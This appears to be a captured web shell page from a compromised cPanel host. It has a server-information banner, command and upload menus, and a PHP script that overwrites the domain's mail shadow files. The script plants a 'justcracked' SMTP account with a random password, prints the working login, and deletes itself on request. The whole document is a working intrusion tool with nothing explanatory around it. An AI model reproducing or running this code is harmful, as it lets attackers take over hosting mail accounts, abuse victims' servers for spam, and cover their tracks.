Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php error_reporting(0); $_currUser = get_current_user(); $_homePath = ["/home/", "/home1/", "/home2/", "/home3/", "/home4/", "/home5/", "/home6/", "/home7/", "/home8/", "/home9/", "/home10/"]; $_this = 0; foreach($_homePath as $_home) { if(file_exists($_home . $_currUser)) { $_this++; if($_this > 0) { $_workHome = $_home; break; } } } $_cp = "$_workHome$_currUser/.cpanel"; if (is_dir($_cp)) { $_currDomain = $_SERVER['HTTP_HOST']; if(strstr($_currDomain, 'www.')){ $_currDomain = str_replace("www.","",$_currDomain); }else{ $_currDomain = $_currDomain; } $_thispwd = "cracked.smtp" . mt_rand(100,999); $_pwd = crypt($_thispwd, "$6$the3x$"); mkdir("$_workHome$_currUser/etc/$_currDomain"); $_smtp = 'justcracked:' . $_pwd . ':16249:::::' . "\n"; $_shadow1 = "/home/$_currUser/etc/$_currDomain/shadow"; $_shadow2 = "/home/$_currUser/etc/shadow"; $_fo=fopen($_shadow1,"w"); fwrite($_fo,$_smtp); $_fo2=fopen($_shadow2,"w"); fwrite($_fo2,$_smtp); echo "$_currDomain|587|justcracked@$_currDomain|" . $_thispwd; } else { echo "Broh Go ahead not worked#"; } if(isset($_GET["d"])) unlink(__FILE__); ?>